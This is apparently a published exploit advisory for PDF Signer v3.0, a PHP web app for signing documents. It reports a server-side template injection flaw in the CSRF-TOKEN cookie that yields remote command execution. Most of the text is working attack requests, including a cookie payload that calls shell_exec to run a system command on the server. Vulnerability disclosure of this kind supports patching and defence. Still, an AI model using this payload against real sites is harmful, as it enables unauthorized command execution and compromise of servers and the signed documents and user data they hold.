# Exploit Title: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie # Dork: N/A # Date: 2019-01-28 # Exploit Author: dd_ (info@malicious.group) # Vendor Homepage: https://codecanyon.net/user/simcy_creative # Software Link: https://codecanyon.net/item/signer-create-digital-signatures-and-sign-pdf-documents-online/20737707 # Version: v3.0 # Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log) # Vendor Banner: Signer v3.0 a Create Digital signatures and Sign PDF documents # Research IRC: irc.blackcatz.org #blackcatz # Vulnerability: Server-Side Template Injection leading to Remote Command Execution due to improper Cookie handling and improper CSRF implementation. # POC: # 1) GET / HTTP/1.1 Host: signer.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://signer.local/signin/?secure=true Connection: close Cookie: CSRF-TOKEN=rnqvt{{[PHP_COMMAND_HERE]}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl Upgrade-Insecure-Requests: 1 # Example [REQUEST] GET / HTTP/1.1 Host: signer.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://signer.local/signin/?secure=true Connection: close Cookie: CSRF-TOKEN=rnqvt{{shell_exec('ls -lah')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl Upgrade-Insecure-Requests: 1 [RESPONSE] --half way down page---snip-- --- snip ---